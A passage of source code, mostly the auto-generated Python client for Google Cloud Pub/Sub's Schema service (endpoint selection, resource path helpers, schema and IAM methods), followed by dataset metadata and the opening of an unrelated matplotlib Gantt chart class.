next(iter(cls._transport_registry.values()))\n\n\nclass SchemaServiceClient(metaclass=SchemaServiceClientMeta):\n \"\"\" Service for doing schema-related operations.\n EXPERIMENTAL: The Schema service is in development and may not\n work yet.\n \"\"\"\n\n @staticmethod\n def _get_default_mtls_endpoint(api_endpoint):\n \"\"\"Convert api endpoint to mTLS endpoint.\n Convert \"*.sandbox.googleapis.com\" and \"*.googleapis.com\" to\n \"*.mtls.sandbox.googleapis.com\" and \"*.mtls.googleapis.com\" respectively.\n Args:\n api_endpoint (Optional[str]): the api endpoint to convert.\n Returns:\n str: converted mTLS api endpoint.\n \"\"\"\n if not api_endpoint:\n return api_endpoint\n\n mtls_endpoint_re = re.compile(\n r\"(?P[^.]+)(?P\\.mtls)?(?P\\.sandbox)?(?P\\.googleapis\\.com)?\"\n )\n\n m = mtls_endpoint_re.match(api_endpoint)\n name, mtls, sandbox, googledomain = m.groups()\n if mtls or not googledomain:\n return api_endpoint\n\n if sandbox:\n return api_endpoint.replace(\n \"sandbox.googleapis.com\", \"mtls.sandbox.googleapis.com\"\n )\n\n return api_endpoint.replace(\".googleapis.com\", \".mtls.googleapis.com\")\n\n DEFAULT_ENDPOINT = \"pubsub.googleapis.com\"\n DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore\n DEFAULT_ENDPOINT\n )\n\n @classmethod\n def from_service_account_file(cls, filename: str, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n file.\n\n Args:\n filename (str): The path to the service account private key json\n file.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n {@api.name}: The constructed client.\n \"\"\"\n credentials = service_account.Credentials.from_service_account_file(filename)\n kwargs[\"credentials\"] = credentials\n return cls(*args, **kwargs)\n\n from_service_account_json = from_service_account_file\n\n @property\n def transport(self) -> SchemaServiceTransport:\n \"\"\"Return the transport used by the client instance.\n\n Returns:\n SchemaServiceTransport: The transport used by the client instance.\n \"\"\"\n return self._transport\n\n @staticmethod\n def schema_path(project: str, schema: str,) -> str:\n \"\"\"Return a fully-qualified schema string.\"\"\"\n return \"projects/{project}/schemas/{schema}\".format(\n project=project, schema=schema,\n )\n\n @staticmethod\n def parse_schema_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a schema path into its component segments.\"\"\"\n m = re.match(r\"^projects/(?P.+?)/schemas/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_billing_account_path(billing_account: str,) -> str:\n \"\"\"Return a fully-qualified billing_account string.\"\"\"\n return \"billingAccounts/{billing_account}\".format(\n billing_account=billing_account,\n )\n\n @staticmethod\n def parse_common_billing_account_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a billing_account path into its component segments.\"\"\"\n m = re.match(r\"^billingAccounts/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_folder_path(folder: str,) -> str:\n \"\"\"Return a fully-qualified folder string.\"\"\"\n return \"folders/{folder}\".format(folder=folder,)\n\n @staticmethod\n def parse_common_folder_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a folder path into its component segments.\"\"\"\n m = re.match(r\"^folders/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_organization_path(organization: str,) -> str:\n \"\"\"Return a fully-qualified organization string.\"\"\"\n return \"organizations/{organization}\".format(organization=organization,)\n\n @staticmethod\n def parse_common_organization_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a organization path into its component segments.\"\"\"\n m = re.match(r\"^organizations/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_project_path(project: str,) -> str:\n \"\"\"Return a fully-qualified project string.\"\"\"\n return \"projects/{project}\".format(project=project,)\n\n @staticmethod\n def parse_common_project_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a project path into its component segments.\"\"\"\n m = re.match(r\"^projects/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_location_path(project: str, location: str,) -> str:\n \"\"\"Return a fully-qualified location string.\"\"\"\n return \"projects/{project}/locations/{location}\".format(\n project=project, location=location,\n )\n\n @staticmethod\n def parse_common_location_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a location path into its component segments.\"\"\"\n m = re.match(r\"^projects/(?P.+?)/locations/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n def __init__(\n self,\n *,\n credentials: Optional[credentials.Credentials] = None,\n transport: Union[str, SchemaServiceTransport, None] = None,\n client_options: Optional[client_options_lib.ClientOptions] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n ) -> None:\n \"\"\"Instantiate the schema service client.\n\n Args:\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n transport (Union[str, ~.SchemaServiceTransport]): The\n transport to use. If set to None, a transport is chosen\n automatically.\n client_options (client_options_lib.ClientOptions): Custom options for the\n client. It won't take effect if a ``transport`` instance is provided.\n (1) The ``api_endpoint`` property can be used to override the\n default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT\n environment variable can also be used to override the endpoint:\n \"always\" (always use the default mTLS endpoint), \"never\" (always\n use the default regular endpoint) and \"auto\" (auto switch to the\n default mTLS endpoint if client certificate is present, this is\n the default value). However, the ``api_endpoint`` property takes\n precedence if provided.\n (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable\n is \"true\", then the ``client_cert_source`` property can be used\n to provide client certificate for mutual TLS transport. If\n not provided, the default SSL client certificate will be used if\n present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is \"false\" or not\n set, no client certificate will be used.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n\n Raises:\n google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport\n creation failed for any reason.\n \"\"\"\n if isinstance(client_options, dict):\n client_options = client_options_lib.from_dict(client_options)\n if client_options is None:\n client_options = client_options_lib.ClientOptions()\n\n # Create SSL credentials for mutual TLS if needed.\n use_client_cert = bool(\n util.strtobool(os.getenv(\"GOOGLE_API_USE_CLIENT_CERTIFICATE\", \"false\"))\n )\n\n ssl_credentials = None\n is_mtls = False\n if use_client_cert:\n if client_options.client_cert_source:\n import grpc # type: ignore\n\n cert, key = client_options.client_cert_source()\n ssl_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n is_mtls = True\n else:\n creds = SslCredentials()\n is_mtls = creds.is_mtls\n ssl_credentials = creds.ssl_credentials if is_mtls else None\n\n # Figure out which api endpoint to use.\n if client_options.api_endpoint is not None:\n api_endpoint = client_options.api_endpoint\n else:\n use_mtls_env = os.getenv(\"GOOGLE_API_USE_MTLS_ENDPOINT\", \"auto\")\n if use_mtls_env == \"never\":\n api_endpoint = self.DEFAULT_ENDPOINT\n elif use_mtls_env == \"always\":\n api_endpoint = self.DEFAULT_MTLS_ENDPOINT\n elif use_mtls_env == \"auto\":\n api_endpoint = (\n self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT\n )\n else:\n raise MutualTLSChannelError(\n \"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always\"\n )\n\n # Save or instantiate the transport.\n # Ordinarily, we provide the transport, but allowing a custom transport\n # instance provides an extensibility point for unusual situations.\n if isinstance(transport, SchemaServiceTransport):\n # transport is a SchemaServiceTransport instance.\n if credentials or client_options.credentials_file:\n raise ValueError(\n \"When providing a transport instance, \"\n \"provide its credentials directly.\"\n )\n if client_options.scopes:\n raise ValueError(\n \"When providing a transport instance, \"\n \"provide its scopes directly.\"\n )\n self._transport = transport\n else:\n Transport = type(self).get_transport_class(transport)\n self._transport = Transport(\n credentials=credentials,\n credentials_file=client_options.credentials_file,\n host=api_endpoint,\n scopes=client_options.scopes,\n ssl_channel_credentials=ssl_credentials,\n quota_project_id=client_options.quota_project_id,\n client_info=client_info,\n )\n\n def create_schema(\n self,\n request: gp_schema.CreateSchemaRequest = None,\n *,\n parent: str = None,\n schema: gp_schema.Schema = None,\n schema_id: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> gp_schema.Schema:\n r\"\"\"Creates a schema.\n\n Args:\n request (:class:`~.gp_schema.CreateSchemaRequest`):\n The request object. Request for the CreateSchema method.\n parent (:class:`str`):\n Required. The name of the project in which to create the\n schema. Format is ``projects/{project-id}``.\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n schema (:class:`~.gp_schema.Schema`):\n Required. The schema object to create.\n\n This schema's ``name`` parameter is ignored. The schema\n object returned by CreateSchema will have a ``name``\n made using the given ``parent`` and ``schema_id``.\n This corresponds to the ``schema`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n schema_id (:class:`str`):\n The ID to use for the schema, which will become the\n final component of the schema's resource name.\n\n See\n https://cloud.google.com/pubsub/docs/admin#resource_names\n for resource name constraints.\n This corresponds to the ``schema_id`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.gp_schema.Schema:\n A schema resource.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent, schema, schema_id])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a gp_schema.CreateSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, gp_schema.CreateSchemaRequest):\n request = gp_schema.CreateSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if parent is not None:\n request.parent = parent\n if schema is not None:\n request.schema = schema\n if schema_id is not None:\n request.schema_id = schema_id\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.create_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def get_schema(\n self,\n request: schema.GetSchemaRequest = None,\n *,\n name: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> schema.Schema:\n r\"\"\"Gets a schema.\n\n Args:\n request (:class:`~.schema.GetSchemaRequest`):\n The request object. Request for the GetSchema method.\n name (:class:`str`):\n Required. The name of the schema to get. Format is\n ``projects/{project}/schemas/{schema}``.\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.schema.Schema:\n A schema resource.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.GetSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.GetSchemaRequest):\n request = schema.GetSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.get_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def list_schemas(\n self,\n request: schema.ListSchemasRequest = None,\n *,\n parent: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> pagers.ListSchemasPager:\n r\"\"\"Lists schemas in a project.\n\n Args:\n request (:class:`~.schema.ListSchemasRequest`):\n The request object. Request for the `ListSchemas`\n method.\n parent (:class:`str`):\n Required. The name of the project in which to list\n schemas. Format is ``projects/{project-id}``.\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.pagers.ListSchemasPager:\n Response for the ``ListSchemas`` method.\n\n Iterating over this object will yield results and\n resolve additional pages automatically.\n\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.ListSchemasRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.ListSchemasRequest):\n request = schema.ListSchemasRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if parent is not None:\n request.parent = parent\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.list_schemas]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # This method is paged; wrap the response in a pager, which provides\n # an `__iter__` convenience method.\n response = pagers.ListSchemasPager(\n method=rpc, request=request, response=response, metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n def delete_schema(\n self,\n request: schema.DeleteSchemaRequest = None,\n *,\n name: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> None:\n r\"\"\"Deletes a schema.\n\n Args:\n request (:class:`~.schema.DeleteSchemaRequest`):\n The request object. Request for the `DeleteSchema`\n method.\n name (:class:`str`):\n Required. Name of the schema to delete. Format is\n ``projects/{project}/schemas/{schema}``.\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.DeleteSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.DeleteSchemaRequest):\n request = schema.DeleteSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.delete_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n rpc(\n request, retry=retry, timeout=timeout, metadata=metadata,\n )\n\n def validate_schema(\n self,\n request: gp_schema.ValidateSchemaRequest = None,\n *,\n parent: str = None,\n schema: gp_schema.Schema = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> gp_schema.ValidateSchemaResponse:\n r\"\"\"Validates a schema.\n\n Args:\n request (:class:`~.gp_schema.ValidateSchemaRequest`):\n The request object. Request for the `ValidateSchema`\n method.\n parent (:class:`str`):\n Required. The name of the project in which to validate\n schemas. Format is ``projects/{project-id}``.\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n schema (:class:`~.gp_schema.Schema`):\n Required. The schema object to\n validate.\n This corresponds to the ``schema`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.gp_schema.ValidateSchemaResponse:\n Response for the ``ValidateSchema`` method.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent, schema])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a gp_schema.ValidateSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, gp_schema.ValidateSchemaRequest):\n request = gp_schema.ValidateSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if parent is not None:\n request.parent = parent\n if schema is not None:\n request.schema = schema\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.validate_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def validate_message(\n self,\n request: schema.ValidateMessageRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> schema.ValidateMessageResponse:\n r\"\"\"Validates a message against a schema.\n\n Args:\n request (:class:`~.schema.ValidateMessageRequest`):\n The request object. Request for the `ValidateMessage`\n method.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.schema.ValidateMessageResponse:\n Response for the ``ValidateMessage`` method.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.ValidateMessageRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.ValidateMessageRequest):\n request = schema.ValidateMessageRequest(request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.validate_message]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def set_iam_policy(\n self,\n request: iam_policy.SetIamPolicyRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> policy.Policy:\n r\"\"\"Sets the IAM access control policy on the specified\n function. Replaces any existing policy.\n Args:\n request (:class:`~.iam_policy.SetIamPolicyRequest`):\n The request object. Request message for `SetIamPolicy`\n method.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n Returns:\n ~.policy.Policy:\n Defines an Identity and Access Management (IAM) policy.\n It is used to specify access control policies for Cloud\n Platform resources.\n A ``Policy`` is a collection of ``bindings``. A\n ``binding`` binds one or more ``members`` to a single\n ``role``. Members can be user accounts, service\n accounts, Google groups, and domains (such as G Suite).\n A ``role`` is a named list of permissions (defined by\n IAM or configured by users). A ``binding`` can\n optionally specify a ``condition``, which is a logic\n expression that further constrains the role binding\n based on attributes about the request and/or target\n resource.\n **JSON Example**\n ::\n {\n \"bindings\": [\n {\n \"role\": \"roles/resourcemanager.organizationAdmin\",\n \"members\": [\n \"user:mike@example.com\",\n \"group:admins@example.com\",\n \"domain:google.com\",\n \"serviceAccount:my-project-id@appspot.gserviceaccount.com\"\n ]\n },\n {\n \"role\": \"roles/resourcemanager.organizationViewer\",\n \"members\": [\"user:eve@example.com\"],\n \"condition\": {\n \"title\": \"expirable access\",\n \"description\": \"Does not grant access after Sep 2020\",\n \"expression\": \"request.time <\n timestamp('2020-10-01T00:00:00.000Z')\",\n }\n }\n ]\n }\n **YAML Example**\n ::\n bindings:\n - members:\n - user:mike@example.com\n - group:admins@example.com\n - domain:google.com\n - serviceAccount:my-project-id@appspot.gserviceaccount.com\n role: roles/resourcemanager.organizationAdmin\n - members:\n - user:eve@example.com\n role: roles/resourcemanager.organizationViewer\n condition:\n title: expirable access\n description: Does not grant access after Sep 2020\n expression: request.time < timestamp('2020-10-01T00:00:00.000Z')\n For a description of IAM and its features, see the `IAM\n developer's\n guide `__.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # The request isn't a proto-plus wrapped type,\n # so it must be constructed via keyword expansion.\n if isinstance(request, dict):\n request = iam_policy.SetIamPolicyRequest(**request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method.wrap_method(\n self._transport.set_iam_policy,\n default_timeout=None,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"resource\", request.resource),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def get_iam_policy(\n self,\n request: iam_policy.GetIamPolicyRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> policy.Policy:\n r\"\"\"Gets the IAM access control policy for a function.\n Returns an empty policy if the function exists and does\n not have a policy set.\n Args:\n request (:class:`~.iam_policy.GetIamPolicyRequest`):\n The request object. Request message for `GetIamPolicy`\n method.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n Returns:\n ~.policy.Policy:\n Defines an Identity and Access Management (IAM) policy.\n It is used to specify access control policies for Cloud\n Platform resources.\n A ``Policy`` is a collection of ``bindings``. A\n ``binding`` binds one or more ``members`` to a single\n ``role``. Members can be user accounts, service\n accounts, Google groups, and domains (such as G Suite).\n A ``role`` is a named list of permissions (defined by\n IAM or configured by users). A ``binding`` can\n optionally specify a ``condition``, which is a logic\n expression that further constrains the role binding\n based on attributes about the request and/or target\n resource.\n **JSON Example**\n ::\n {\n \"bindings\": [\n {\n \"role\": \"roles/resourcemanager.organizationAdmin\",\n \"members\": [\n \"user:mike@example.com\",\n \"group:admins@example.com\",\n \"domain:google.com\",\n \"serviceAccount:my-project-id@appspot.gserviceaccount.com\"\n ]\n },\n {\n \"role\": \"roles/resourcemanager.organizationViewer\",\n \"members\": [\"user:eve@example.com\"],\n \"condition\": {\n \"title\": \"expirable access\",\n \"description\": \"Does not grant access after Sep 2020\",\n \"expression\": \"request.time <\n timestamp('2020-10-01T00:00:00.000Z')\",\n }\n }\n ]\n }\n **YAML Example**\n ::\n bindings:\n - members:\n - user:mike@example.com\n - group:admins@example.com\n - domain:google.com\n - serviceAccount:my-project-id@appspot.gserviceaccount.com\n role: roles/resourcemanager.organizationAdmin\n - members:\n - user:eve@example.com\n role: roles/resourcemanager.organizationViewer\n condition:\n title: expirable access\n description: Does not grant access after Sep 2020\n expression: request.time < timestamp('2020-10-01T00:00:00.000Z')\n For a description of IAM and its features, see the `IAM\n developer's\n guide `__.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # The request isn't a proto-plus wrapped type,\n # so it must be constructed via keyword expansion.\n if isinstance(request, dict):\n request = iam_policy.GetIamPolicyRequest(**request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method.wrap_method(\n self._transport.get_iam_policy,\n default_timeout=None,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"resource\", request.resource),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def test_iam_permissions(\n self,\n request: iam_policy.TestIamPermissionsRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> iam_policy.TestIamPermissionsResponse:\n r\"\"\"Tests the specified permissions against the IAM access control\n policy for a function. If the function does not exist, this will\n return an empty set of permissions, not a NOT_FOUND error.\n Args:\n request (:class:`~.iam_policy.TestIamPermissionsRequest`):\n The request object. Request message for\n `TestIamPermissions` method.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n Returns:\n ~.iam_policy.TestIamPermissionsResponse:\n Response message for ``TestIamPermissions`` method.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # The request isn't a proto-plus wrapped type,\n # so it must be constructed via keyword expansion.\n if isinstance(request, dict):\n request = iam_policy.TestIamPermissionsRequest(**request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method.wrap_method(\n self._transport.test_iam_permissions,\n default_timeout=None,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"resource\", request.resource),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n\ntry:\n DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(\n client_library_version=pkg_resources.get_distribution(\n \"google-cloud-pubsub\",\n ).version,\n )\nexcept pkg_resources.DistributionNotFound:\n DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()\n\n\n__all__ = (\"SchemaServiceClient\",)\n","repo_name":"google-cloud-sdk-unofficial/google-cloud-sdk","sub_path":"lib/third_party/google/pubsub_v1/services/schema_service/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":43591,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"85"} +{"seq_id":"35928013224","text":"from datetime import datetime\nimport sys\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\nimport matplotlib.dates as mdates\n\nimport logging\n\n\nclass Gantt(object):\n '''\n Simple Gantt renderer.\n Uses *matplotlib* rendering capabilities.\n '''\n\n # Red Yellow Green diverging colormap\n # from http://colorbrewer2.org/\n RdYlGr = ['#d73027', '#f46d43', '#fdae61',\n '#fee08b', '#ffffbf', '#d9ef8b',\n '#a6d96a', '#66bd63', '#1a9850']\n\n POS_START = 1.0\n POS_STEP = 0.5\n\n def __init__(self, tasks):\n self._fig = plt.figure()\n self._ax = self._fig.add_axes([0.1, 0.1, .75, .5])\n\n self.tasks = tasks[::-1]\n\n def _format_date(self, date_string):\n '''\n Formats string representation of *date_string* into *matplotlib.dates*\n instance.\n '''\n try:\n date = datetime.strptime(date_string, '%Y-%m-%d %H:%M:%S')\n except ValueError as err:\n logging.error(\"String '{0}' can not be converted to datetime object: {1}\"\n .format(date_string, err))\n sys.exit(-1)\n mpl_date = mdates.date2num(date)\n return mpl_date\n\n def _plot_bars(self):\n '''\n Processes each task and adds *barh* to the current *self._ax* (*axes*).\n '''\n i = 0\n for task in self.tasks:\n start = self._format_date(task['start'])\n end = self._format_date(task['end'])\n bottom = (i * Gantt.POS_STEP) + Gantt.POS_START\n width = end - start\n self._ax.barh(bottom, width, left=start, height=0.3,\n align='center', label=task['label'],\n color = Gantt.RdYlGr[i])\n i += 1\n\n def _configure_yaxis(self):\n '''y axis'''\n task_labels = [t['label'] for t in self.tasks]\n pos = self._positions(len(task_labels))\n ylocs = self._ax.set_yticks(pos)\n ylabels = self._ax.set_yticklabels(task_labels)\n plt.setp(ylabels, size='medium')\n\n def _configure_xaxis(self):\n ''''x axis'''\n # make x axis date axis\n self._ax.xaxis_date()\n\n # format date to 